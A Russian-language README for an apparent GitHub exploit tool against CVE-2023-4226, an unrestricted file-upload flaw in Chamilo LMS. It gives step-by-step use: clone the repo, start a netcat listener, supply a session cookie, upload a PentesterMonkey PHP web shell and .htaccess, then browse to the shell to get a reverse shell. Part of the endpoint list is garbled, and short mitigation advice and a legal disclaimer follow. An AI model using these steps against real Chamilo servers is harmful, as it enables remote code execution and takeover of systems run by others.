
Уязвимость неограниченной загрузки файлов в **Chamilo LMS** (<= v1.11.24).
Скрипт на Python, автоматизирующий эксплуатацию CVE-2023-4226 — уязвимости неограниченной загрузки файлов в Chamilo LMS (<= v1.11.24). Загружает PHP-вебшелл на основе PentesterMonkey и настраивает .htaccess для получения reverse shell. Подробнее: Advisory от STAR Labs.
/main/inc/ajax/work.ajax.php, получая RCE.ch_sid).rce.php с IP и портом./main/work/work.php?cidReq=HW./main/inc/ajax/work.ajax.php для загрузки rce.php и .htaccess./app/cache/rce.php).Python: requests, colorama.
pip install requests colorama
Файлы: rce.php (PentesterMonkey, включён в репозиторий), .htaccess (генерируется скриптом).
Сеть: IP и порт для listener (напр. nc -lvnp 4444).
Клонируй репозиторий:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
Выдай скрипту права на выполнение:
chmod +x CVE-2023-4226.py
Установи зависимости:
pip install requests colorama
Запусти listener в терминале:
nc -lvnp 4444
Выполни скрипт:
./CVE-2023-4226.py
Введи:
ch_sid.Перейди к вебшеллу, чтобы запустить reverse shell:
http://<chamilo>/app/cache/rce.php
Пример: http://chamilo.local/app/cache/rce.php
Обновись до Chamilo >= v1.11.26.
Санитизируй имена файлов.
Блокируй HTML в disable_dangerous_file().
Добавь в .htaccess:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
Использование только для авторизованного тестирования. Несанкционированное использование незаконно.